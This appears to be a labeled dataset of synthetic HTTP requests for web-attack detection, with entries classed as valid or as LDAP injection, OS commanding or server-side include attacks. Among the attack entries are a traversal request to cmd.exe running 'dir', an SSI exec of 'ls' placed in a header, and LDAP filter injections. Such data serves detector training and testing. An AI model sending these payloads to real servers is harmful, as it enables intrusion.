Max-Forwards: 9
MIME-Version: 7.9
Pragma: dhie5e='1hire'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest cnonce="edgsrsg"
Range: 3-
Referer: http://e0ru.st/nhoah/iahrcb.asp
TE: chunked,deflate
Trailer: TE
User-Agent: sTiFruU http://www.hesdgoa.fr
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 6.3 185.42.225.104
Transfer-Encoding: compress
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 209 99.218.44.161 "n5shpLu8ptOeAstrt7u" "Mon, 11 Feb 08 12:06:51 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41892
Start - Id: 38836
class: LdapInjection
GET /azmPP7AfczQyGJ/f9.-6S/5FhT2Gezr0bJIvArjPw/Hw/65Rw0eed/irc5s2neSm7s/icR4iein/TnbEsni2rxshsneerrc/aasqX-3GzVf/cHn7cmdFou6d_Py/rggSieoMgSYDOih/eTkk.tiff?6eEeuts2mrdkftc=irhrdaovlgie+%25awinnt%3F+eg&hyAGHwY-f=%29+%28%7C++++%28displayName%3Dhad*%29++++%28name%3D++had*+++%29%28mail%3Dhad*+++%29&a4lemmpmawnat=v%7Extermdiroar&JZRtm=nodermWbeixkOe8htn HTTP/1.1
Host: www.aemZeee6hi.st
Connection: lelTn9
Accept: image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: taaorn-7din;q=0.9
Cache-Control: qe=wcx2
Client-ip: 244.46.205.26
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="62"
Date: Sun, 05 Jun 05 18:11:29 UTC
ETag: W/"h6MB8nr3He6wdxV5k"
Expect: 0rs7agj
From: oeee@geqtla3o.org
If-Modified-Since: Fri, 27 Oct 06 22:20:13 GMT
If-Unmodified-Since: Thu, 18 Mar 04 04:46:33 UTC
If-Match: "YZZgdo@TyM1lH@sGAkvs"
If-None-Match: *
If-Range: Fri, 05 Jan 07 06:42:12 UTC
Max-Forwards: 1282
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM MW1rcmkxZjZ6dm5zbnJlOW4zMWlhbmVka2F0ZTJsOHQ4aXRycnM3aWVmb3cyb0t0
Range: 088-865,-53,38290-
Referer: /tlisheie.jsp
TE: trailers,chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: eKw6oIS http://www.x4fprz.fr
UA-CPU: PowerPC
UA-Disp: 3032,6825,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 072x4241
Via: ae5/7.8 www.uasn4e.js, 4.9 www.ncuekQ4n.jpeg:9567, 8.2 76.183.213.38:302
Transfer-Encoding: Eo5p; HcvteOsl=eaceet
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 19.112.51.121
X-Serial-Number: 465738
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38836
Start - Id: 11742
class: Valid
GET /eoI9OdecduT/L0UfiRdkPod7HU/n0ibshc4sekoeninwade/teaecrtaod/oWiazsboiSctrp/i13vUagEp3igYv/etyut.mdb?ufsirSn5fdSztow=5842305&ssmayInm7Spns4l=ctxrxEwX&yBlocationPKI4Wlog2BV=ome&emaa6tdrdm3lnm=NH+%7EdvR%28%3Dprocessing-instructionallnu&tujoTy=ee2rlaaiof&Iseen=wcxhU4Bil_Iz&asdo=tvL5QGia4.&utUx=allboot.ini%7Ete65aseieN&lleic7h2=ao&phnre6coyeere2=1oiinwHaiytirnthj HTTP/1.0
Host: www.bsenrqielh.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: tpfpih-oseRre;q=0.9, likcrtee-en, Haie-rhahna;q=0.0, yldM-rofwDexS, oc-aeEicih
Cache-Control: no-cache
Client-ip: 220.48.116.4
Cookie: elcceao=hm7\&;u9toal=1723774;7RlibZCmWYE=65511183;t8sf2oFp4Ei=rL2h;6W.s08Ksam=a\e~linkvusrDx)8oDr3;m45ssnedsksAmy=0so
Cookie2: $Version="180"
Date: Sat, 20 Sep 08 09:48:35 GMT
ETag: W/"a@6P.77CWrtDMk2PSW"
Expect: 100-continue
From: abst@3k8ohdn.gov
If-Modified-Since: Wed, 21 Oct 09 07:29:55 GMT
If-Unmodified-Since: Wed, 02 Apr 08 07:15:18 UTC
If-Match: "tKrQCqkB3qbqCPk"
If-None-Match: *
If-Range: Mon, 18 Jan 10 18:06:28 UTC
Max-Forwards: 19
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: Basic ZXRvZGU6aW9ibGhpMmM=
Range: 1-,5-,24371-73606
Referer: http://www.flud.biz/7mtsih.msf
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/7.7 (X11; U; Linux i586 9.5; ou-2e; rv:6.9.0) Gecko/46276460
UA-CPU: x86
UA-Disp: 1077,6498,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 362x4409
Via: 0kares/7.7 15.21.171.168, 1.7 185.196.195.102
Transfer-Encoding: sNltE; qeeo=eigsfs
Upgrade: aiubsu/5.7, bEar3/1.8, k5eah/6.6, uatn/4.0
Warning: 990 217.45.111.90 "utbxe9d4csrsohke" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11742
Start - Id: 13446
class: Valid
GET /9ZWelf00/aij0sjbGaet9JoDohtfc/t1GdoobOs8jZ9v/wcebo/nHbRvSZ9P/eUucZyhTw-/G@EdeleteP.jpg?hqc0Na8oNtRlx=boanwhdatsqehs6&er=ttc&qahdad5c4tmo=yautoexec&vtrrnkarmemwd=ee9sismertdfOdt&muol6aT=6breplacetyufE+r0v5sl&i5naucglohtrauo=ail4rnhtaccesoit&dutstampro6w3e5=c0iln+2cns&ndmm=yuai2divuoomlTo1&aTsmtasN=9179054&m0eeeoa=510327&eaudcbrfnag=11&yHtonpuuO=covlsaoNigr HTTP/1.0
Host: 83.152.197.26
Connection: close
Accept: image/*;q=0.2, application/x-tar, audio/*;q=0.5
Accept-Charset: x-mac-greek
Accept-Encoding: *;q=0.5
Accept-Language: aeita-ee, oor-nnhheafy;q=0.4
Cache-Control: no-cache
Client-ip: 61.236.0.64
Cookie: iaOcG=197661;sdkt=86;d8kh=90473;hdaz7tgLi=068348880
Cookie2: $Version="4"
Date: Fri, 22 May 09 04:30:37 CET
ETag: W/"r5D2Ulp23chcWD9A"
Expect: Di1na=l6eprjet
From: onWi@fbwst.st
If-Modified-Since: Sun, 30 Apr 06 03:00:07 GMT
If-Unmodified-Since: Tue, 04 May 04 19:41:40 UTC
If-Match: "jOrut7OsFyJx5S9tbJY@"
If-None-Match: "039TcZmShdyX7Hr"
If-Range: Mon, 04 May 09 18:33:26 CET
Max-Forwards: 79
MIME-Version: 0.5
Pragma: fuwlO='n'
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: Basic cmZlR2V0OmRhcG54bg==
Range: -20257
Referer: /a1yeaodj/0iy06me/sr7fsy5/wrsnMtl.dll
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.2 (Windows; U; WinNT 7.9; dh-em; rv:4.3.5) Gecko/36390123
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9732x9138
Via: 8.2 www.eptl.jpg, 9.7 www.dlOe.html, FTP/2.4 83.212.224.219:9
Transfer-Encoding: EsNvt
Upgrade: gau/6.0
Warning: 231 www.rsit.htm "dIbgtoshqoaaxhmt" "Sun, 20 Jun 04 15:44:58 CET"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13446
Start - Id: 17659
class: Valid
GET /tSgetupfmtnfj/is4bO5xqp3/f5nnWlVtNL-/in7neOhoInfr6emr/xP6KWccvqv/tw5CGbrFkj1Gryy3/0Ji6na/gbmxg@P8DK-/icsen/8doIuFpla/ayleshfcetraifogtA/uWXpkn.3nBBU@d.bin?rBxirHe97o3s=twhi&Orn=7&Seoeo=gms6maQxoute&omifedeke=2eustStt5gof&piaedn5ylChEied=ueniy&eoi4T51tatna=WtonTa3libee HTTP/1.0
Host: www.neyd.ch:42
Connection: close
Accept: */*
Accept-Charset: big5, cp-932;q=0.8, iso-8859-1;q=0.6, x-mac-chinesetrad;q=0.9, cp-950
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 93.54.113.223
Cookie: nyeedxnrom1eYn= yaJodoilike;asp3u=ofcn1wceeeoyts;3FxTbPR=5;mdclindmjue=258;goabeyhpd=eIbx8t9hcM6e;sne=mTU9SW
Cookie2: $Version="1"
Date: Tue, 24 Jun 08 19:30:24 CET
ETag: W/"YJhwr3KmHodY4T8"
Expect: 100-continue
From: orsph@74It.it
If-Modified-Since: Fri, 07 Dec 07 06:05:00 UTC
If-Unmodified-Since: Thu, 19 Nov 09 13:50:23 CET
If-Match: "5NjIRYjJ6Vi3Ovv"
If-None-Match: "c1Qy6rUiYWkb@PBgy3J1"
If-Range: Sat, 30 Apr 05 20:30:08 CET
Max-Forwards: 4647
MIME-Version: 3.4
Pragma: tEtT=dxeit
Proxy-Authorization: Digest nc=e65f7eEB
Authorization: eihw 0erb=eebdTn
Range: 7-,-84952
Referer: http://www.chaMeeaI.st/sozzp6.tiff
TE: trailers
Trailer: If-Modified-Since
User-Agent: af@wzge1I http://www.nasbllh.de
UA-CPU: Sparc
UA-Disp: 4701,7597,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 813x197
Via: HTTP/6.0 www.eprreIcs.jpg
Transfer-Encoding: compress
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 288 51.112.234.217 "feiedSegcNUchAneon2h" "Thu, 19 Feb 09 11:59:33 UTC"
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 17659
Start - Id: 36596
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.eiytwoncin.org
Connection: pRadfoe
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: 7d='lvo'
Client-ip: 3.238.183.148
Cookie: eemAtqc=sJCn@5;R25r1Dboot.ini=caoftwa=arE1xei;weyawille=072383832;tou7snoGlyxma=6go;biframelinkga;baaauterra9e=fIClNmF4R;Dmwu9passwdk@1=t0ett
Cookie2: $Version="52"
Date: Thu, 02 Aug 07 11:02:36 CET
ETag: W/"2ugy4E-E4UwJTbxpi1"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Tue, 14 Oct 08 09:54:42 UTC
If-Unmodified-Since: Mon, 06 Dec 04 10:06:08 CET
If-Match: "IXnls1olXSpM0sji"
If-None-Match: *
If-Range: Tue, 15 Jul 08 04:54:36 UTC
Max-Forwards: 365
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic OWlMdGVpaEk6OW44bndybnI=
Range: -23163,-7
Referer: /Sfab.gif
TE: gzip
Trailer: Max-Forwards
User-Agent: 7CHWw1Ri0 http://www.62Fw.fr
UA-CPU: MIPS
UA-Disp: 6285,2473,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: uowA1/4.3 www.eAnw04.htm
Transfer-Encoding: identity
Upgrade: r1ots/5.0, shhr/3.4, nnf/3.4, eer/9.7
Warning: 749 www.Tr23iqts.html "ontttfrynef0akictteo" "Sun, 16 Nov 08 15:04:07 CET"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 85538465859468
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36596
Start - Id: 7940
class: Valid
PUT /fe3toktasc5ht.js? HTTP/1.0
Content-Length: 272
Content-Language: wglo,lotiL
Content-Encoding: gzip
Content-Location: http://www.lObeim.ch/oentoee/ateash6/9ngMbms/ohfeticb/bstca.asmx
Content-MD5: dHBlOXRlbG5nV25pb3RuYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Oct 04 10:04:15 GMT
Last-Modified: Fri, 18 May 07 16:42:41 UTC
Host: 68.166.193.90
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.6, identity;q=0.1, gzip;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 225.243.67.249
Cookie: ie=83438384;etter8fnmwTsgT=00
Cookie2: $Version="0"
Date: Tue, 21 Sep 04 18:10:21 UTC
ETag: W/"n27WAq61tVTD_bNT8"
Expect: 100-continue
From: nhostr0g@gey2ahsod.de
If-Modified-Since: Tue, 12 Jul 05 12:44:00 UTC
If-Unmodified-Since: Sun, 02 Sep 07 12:24:34 GMT
If-Match: *
If-None-Match: "I_qC9lWNn89xcXaj_1P"
If-Range: "o.bddNTsLi36bdA"
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM M25ldXB0cU5BbmM1N3RhdXVyZ2FoYjRsM3N0aHRvV2VBdHZjdWVzSW5lc2plTmVl
Authorization: Digest opaque="tdnomT"
Range: 66-
Referer: http://www.kicr3.fr/useun/nconsue6.txt
TE: trailers,trailers,chunked
Trailer: Upgrade
User-Agent: nnaaeI (luaZWU; bVuBRriwM; oEBvxm; 705-@MqxC; 1y6pgowjwQ)
UA-CPU: Sparc
UA-Disp: 1557,362,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7210x017
Via: 5.3 www.cmc9ohmb.css, 6.4 17.31.60.203, 0.6 www.oEl5o1.jpg
Transfer-Encoding: compress
Upgrade: 1Zh/3.5, C8i/6.8, I4m/0.2
Warning: 376 www.Ae5dcnr.gif "8yaneahUte" 
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 534170749
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

pjaHseoS4rMtiim=990041&lt9boo=auhnezah0Souennir&BTMrm-IXNRVL1=rtH&4EIj54i._Zrnull=Deadr&eia=rxinosncumn&e44vreyeput=1lvdcrl9 child0&utuLeFrEo3=+8lh~eu5sgR-)ts&eah=rse&tbt=oXgAEIKjB&tesco=etaltd5a&tsirsAimlasxdar=71&e3ndeg7aieioo=kiuacitrisv1fuoe&9Jh2cG3VqcM=adsNjs3b

End - Id: 7940
Start - Id: 39864
class: SSI
GET /buaGXaNfJd0NP/gnO1/ir2bee/tfotpgTnseuahecSdu/3S0vFKqAH@523@wGrWD/FSbUFVPRIe.dll?jM0Za=6&td0mtoaonrsfeii=107753 HTTP/1.0
Host: 68.167.90.98
Connection: close
Accept: image/*;q=0.9, text/*;q=0.4, image/*
Accept-Charset: *
Accept-Encoding: <!--    #exec    cmd="/bin/ls    -l    /home/sak/enyqnxo62" -->
Accept-Language: s-funirw6;q=0.0, f-lonc, l-zbl;q=0.3, ic-nipan;q=0.9
Cache-Control: no-store
Client-ip: 72.149.162.72
Cookie: soe= acd;fxeu02eact3=fiuunejandmailiise;da= ;Edintanrxerupi=rsor';t5u5YqP1=901
Cookie2: $Version="32"
Date: Thu, 03 Feb 05 15:58:31 UTC
ETag: W/"@BvcADmf.4Ny9zgEXm"
Expect: 100-continue
If-Modified-Since: Wed, 27 Jun 07 22:47:07 GMT
If-Unmodified-Since: Wed, 11 Jun 08 10:17:24 GMT
If-Match: "895t6yWpSMcNM_u_"
If-None-Match: *
If-Range: Mon, 20 Feb 06 16:34:49 CET
Max-Forwards: 5
Authorization: Basic QWlFb3JhOmVjYTNo
Referer: /iaxcoi/oscaI5.zip
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.7 (X11; U; SunOS sun4u 0.0; ke-t1; rv:7.5.7) Gecko/80093391
UA-Disp: 991,4045,16
UA-OS: Win98
Via: FTP/8.2 102.13.66.41, 6.2 www.lfnye.gif, 1.3 198.81.125.97
Transfer-Encoding: compress
Warning: 209 www.daamss.tiff "yniaeoswcau3uo" "Mon, 26 Jun 06 17:21:53 CET"
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 14193348040623
----: ---------------------------------

null

End - Id: 39864
Start - Id: 2269
class: Valid
GET /QqW/4QWceiTnL-9O8.OPElvk/oQP6135q/otAANN5kPnetcatj0/cKMwIDOJsystemQeBz9/oQ/agjuh2HpQXFn/r2NkQxry.css?4Tg=7xOd1&ll1cly=j%3CarCzrd&TYd.60-=5tede8td3&mAX@=Lt0ufasOo&dn1h=o&97ergotdoi8o=8781524&yrnftewsndipnjs=9745715 HTTP/1.1
Host: 159.84.221.35:7
Connection: 7tEu
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: ltugtGev-2an0h
Cache-Control: no-transform
Client-ip: 111.99.151.212
Cookie: 5efbb=714619662;iNa=tlaLAz;tes8tdgmewr3=7868;dlnstr=%t cb;letrzCrhqroontn=neat
Cookie2: $Version="88"
Date: Mon, 23 Jan 06 06:08:35 GMT
ETag: "czBkLOu.NNn9-8RH"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Tue, 20 Jan 04 02:30:24 UTC
If-Unmodified-Since: Fri, 25 May 07 13:24:02 CET
If-Match: *
If-None-Match: "8wTXDti6MY5I4SAK"
If-Range: Mon, 01 Nov 04 24:15:20 UTC
Max-Forwards: 8
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest username="hheA"
Authorization: NTLM aXhlcjJhTGVlZ2VvbmVpcWtuYWJnOXJvb2VvZXRvYXRBZQ==
Range: -458438,6075-5448
Referer: /o18xh.cgi
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 3.9; lr-hr; rv:0.1.2) Gecko/33846487
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 910x667
Via: FTP/5.9 www.n5n5l.jpeg:116, 5.7 www.5hhi4il.htm, 6.0 www.8iBt4.shtml
Transfer-Encoding: gzip
Upgrade: Xnpee/1.8
Warning: 268 www.aimeH.png "tcinawttnIeteq" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 61486796053346804
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2269
Start - Id: 30154
class: Valid
GET /tfur/yA/yq2u/aeeadguhtsevdotlXvRq/e@PiU.w6eS/nde1cowu/oAOxonustmjo2Seaa2P/5emlzb6Cs/Tdts/toautLebsxst/laoatp3aatS3Ctkjlp/hY-bfvff@t.jsp? HTTP/1.0
Host: www.d26q.ch
Connection: hmss
Accept: text/xml;q=0.3
Accept-Charset: ks_c_5601-1987, us-ascii, x-mac-japanese, iso-8859-8
Accept-Encoding: deflate, identity;q=0.3, gzip, identity;q=0.0
Accept-Language: r8us-aqe;q=0.1, xbsl-6areanc, a-ltmeeiu;q=0.1, ay2stvn-tckjar9t, etnzmslr-T4isaw
Cache-Control: no-store
Client-ip: 146.181.60.5
Cookie: J1documentwD=ety7;hfomfab=peoetcFo
Cookie2: $Version="0"
Date: Sun, 21 Feb 10 15:57:55 CET
ETag: "WJVmn.kXGFfEs69g0"
Expect: eldO
From: heOsedeo@tympyx.fr
If-Modified-Since: Sat, 28 Aug 04 06:37:37 GMT
If-Unmodified-Since: Wed, 12 May 04 10:30:05 UTC
If-Match: *
If-None-Match: *
If-Range: "3OoicjSUt7sXG6KGEd"
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM aG56NGV3c05md2l0M2VlbjdhdXNzZTIwZnVsbGVlcG9lNW9TaWVkaXRnbGRyZw==
Authorization: NTLM bHNmSHBjaWNjcm9yaG1hZXNldXNtZXNvY3ZpRXNubmZnZWxlYTdlWGVrZG0=
Range: -1
Referer: http://www.hvdfj.be/9rhi4ldW.exe
TE: gzip,gzip
Trailer: Upgrade
User-Agent: peetexdhRHe
UA-CPU: Sparc
UA-Disp: 9773,678,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 488x0113
Via: HTTP/9.8 www.oxt73l.gif, 1.0 199.114.251.74, HTTP/0.9 17.178.93.238
Transfer-Encoding: identity
Upgrade: eneor/3.9, enodo/5.9
Warning: 169 145.87.255.238 "bhcawmncs4" "Fri, 12 Jan 07 03:02:59 UTC"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 7148566878920478755
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30154
Start - Id: 37698
class: LdapInjection
POST /hcLUDRBqkI/86-9KXMJqj/eIB-1R5P2YX-06QlN.js? HTTP/1.1
Content-Length: 101
Content-Language: gGqadn,usre,b
Content-Encoding: gzip
Content-Location: /C2emoece/nhboIl/oeaaTno.ace
Content-MD5: MXRoOGVwbWF0Nmlwb2t0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Apr 08 12:53:58 UTC
Last-Modified: Mon, 17 Sep 07 10:12:52 CET
Host: www.iyfD.biz
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-10646-ucs-2;q=0.2, us-ascii;q=0.5, iso-8859-2;q=0.7, euc-kr;q=0.5, x-mac-korean
Accept-Encoding: gzip, compress, compress;q=0.1, compress
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 237.81.61.20
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Wed, 23 Jul 08 07:14:05 CET
ETag: "n4cBYNpmLWIikXUq4-kH"
Expect: 100-continue
From: thGyc@rjbnmtcw.gov
If-Modified-Since: Wed, 27 Aug 08 15:48:19 GMT
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: "2BUAk3D-WFJQPDHT_YM"
If-None-Match: *
If-Range: "aZK5oU0xpZjJNXu"
Max-Forwards: 1501
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: http://cbh32e.ch/icbra/0eeed8/a1sr/neffw0/sxchteoK.mp3
TE: chunked,gzip;q=0.3,deflate
Trailer: Accept-Language
User-Agent: iroihsdtf (jKxHFW; gVIkHQ6pB; cEEkQTIoEB)
UA-CPU: MIPS
UA-Disp: 5884,733,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 940x1719
Via: grh/2.4 www.ss9sch.htm:1
Transfer-Encoding: compress
Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

.7yPnph-=cEz)(&(objectClass =  snn*)&ipk4sdmNrMzhoo=389128621&uuktnt8esl8aawi=yEI2PgOF6mj

End - Id: 37698
Start - Id: 9457
class: Valid
GET /dLptn/ez6KamMS/w16o9/sh0T/erwmB1ita9eno4/%uWDP@F.png?Er10ds7co=iass93zi%2B&strci=323&eualr=pessam&2eoynorHtxme7=aSOMq&vFiframeLQOX0VeP=16335&n0matt5eeecn=9a9TWK&thidbaonaae=passthru&dsa7n8t=eMa9%24Eeubttoit HTTP/1.0
Host: 110.133.76.87
Connection: close
Accept: */*;q=0.6
Accept-Charset: utf-7;q=0.3, windows-1250;q=0.5
Accept-Encoding: compress;q=0.1
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 80.170.138.165
Cookie: eegoedhhchnpzft=0192;rmcXjbodyw=e1d
Cookie2: $Version="37"
Date: Sat, 28 Mar 09 12:38:50 GMT
ETag: "8VXrcaxe267wYjWNWF3G"
Expect: 100-continue
From: ieue@hoegnHqytl.be
If-Modified-Since: Sat, 30 May 09 11:39:40 GMT
If-Unmodified-Since: Sat, 25 Nov 06 08:37:07 UTC
If-Match: "AVRKwF57zJp0_xoX"
If-None-Match: *
If-Range: Mon, 10 May 04 01:12:02 GMT
Max-Forwards: 3
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic eXdibHRhOmJhNmg1eXQ=
Authorization: Basic d3BhZWt1ZXk6ZWFhbmxqZ2U=
Range: 2390-,9-,2497-
Referer: http://www.wb6d9r.it/il4m/oshjp/weefgnjc/sxe9m7.dll
TE: trailers
Trailer: Date
User-Agent: Mozilla/1.7 (X11; U; Solaris 4.3; io-ua; rv:3.8.7) Gecko/39396575
UA-CPU: MIPS
UA-Disp: 073,150,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 383x664
Via: HTTP/9.1 www.sejoeeR.css
Transfer-Encoding: deflate
Upgrade: osunde/3.2, hb1wa/9.8, twa/3.2, aRypee/7.6, knlu8/6.7
Warning: 579 28.101.180.151:87 "tiicEdd" "Tue, 17 May 05 01:19:10 GMT"
X-Forwarded-For: 139.44.198.239
X-Serial-Number: 637220700897
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9457
Start - Id: 13513
class: Valid
GET /Rr4Yg/0cknawiUo2Nrny8/iE/4jgyaUcHpX/jiod.ldc_wawoH/kODMhjjPhfLSEK/ttnsalmnr3aey/cYgPn.2Y1lcyTY7WpQ/9uusocett4kweWrnms/eu0.pl?Tettpehaei=ryt%3ESi&DyeVz=9463026&edh9eooir=hrgroup+by&np=66912&7q9D9BiNTTl9=efcenxzd9jc&WwTq2Iq-telnety=mgptaeollahtpassdAa&varRTkJXlocationb=hen6cdaeroasnd&faitfa=8042622&taodt7swlsEthnr=813&tloedbal=-&l9irphsrnflauH=lrovhpwp4tuelw&ds=henzhrhtrsa&7qt3RhVhof=veotsaqhsTirao HTTP/1.0
Host: www.anUsn.org
Connection: e05oq4
Accept: application/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.5, compress;q=0.3, identity, identity, gzip
Accept-Language: oltt-ov, pMtc-aou;q=0.9, nchcrt-nnInohm;q=0.3
Cache-Control: no-store
Client-ip: 22.56.246.14
Cookie: eidOwxt1E7oyegi=pjdzh;se6tN=amr Iee(~5=hr;\;RO=rls$
Cookie2: $Version="077"
Date: Mon, 14 Sep 09 05:19:23 CET
ETag: "8gV8sWEuE.WleVASL2z"
Expect: 100-continue
From: reyhi@itnouasdie.ch
If-Modified-Since: Sat, 21 Jan 06 03:00:41 CET
If-Unmodified-Since: Wed, 05 Oct 05 24:02:10 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: Sat, 22 Mar 08 13:56:03 UTC
Max-Forwards: 35
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: edtti iInHs=qitr6la
Authorization: Digest response="9d09AA19e68FbefD1522CAdD4b021a06"
Range: 99683-
Referer: http://9nrIoct.de/etaewdo/delta/efuse.dll
TE: gzip;q=0.5,deflate;q=0.7
Trailer: Via
User-Agent: ara9anrmat (fyO_roJq; jWq9mTgkY3; eji52UQ; oVTcTtKEK; l0@VJHY)
UA-CPU: MIPS
UA-Disp: 1040,6000,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 912x6854
Via: FTP/8.0 www.osop.tiff, s7hf/4.1 www.whlG.gif
Transfer-Encoding: gzip
Upgrade: oih6d/1.6, uWi/2.3, crt/1.7, twSe/6.3
Warning: 707 86.35.37.2 "9TdUnnt" "Mon, 08 Jan 07 05:09:18 UTC"
X-Forwarded-For: 43.46.247.235
X-Serial-Number: 4445412834170
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 13513
Start - Id: 8759
class: Valid
GET /5TjPI.uK8_9q2o860b/03qj3/QlB3ALn5X4FY/Dboyeymdsvs8ek7/window.open2yZ/ewnzwBl@FHxTmSh/cQcVtbWh-oiNWIa2qii/nnvhuednul/rqeqahpwtais/WMgvybN.GIxk.gif?zElqLy=33574&c4ndGaasa=arnoPgpYFUg&rmena=efh1H%24&e2sc0R=%7Eo&ofe=divepmc%3Evh%2Fu%7Ed4%3Cwmo%2Fu&zeDuae=Ete&aEDeraii9neli=259&dtR5tibn=740860083&xer1pmeshni=h9hasl%25Enoh%27 HTTP/1.0
Host: 205.113.252.206
Connection: keep-alive
Accept: application/zip;q=0.4, image/*, application/zip;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: tkEo-eii;q=0.2, wjom-a;q=0.6, ofertLas-l;q=0.2, tahid-to55er;q=0.6, wasHb-onLt0e
Cache-Control: max-stale=642
Client-ip: 54.104.252.101
Cookie: AouFts=7e8nr;rof2rhcrsu67=enzeeval;MzKrI_.=43;tte1t7rnoiodaa=oT6;rSuhrqei= tei;u4dN=inWPad
Cookie2: $Version="149"
Date: Fri, 04 Sep 09 17:58:54 CET
ETag: W/"qeLyEBcfbxS4Nls9aX.N"
Expect: Sseo3
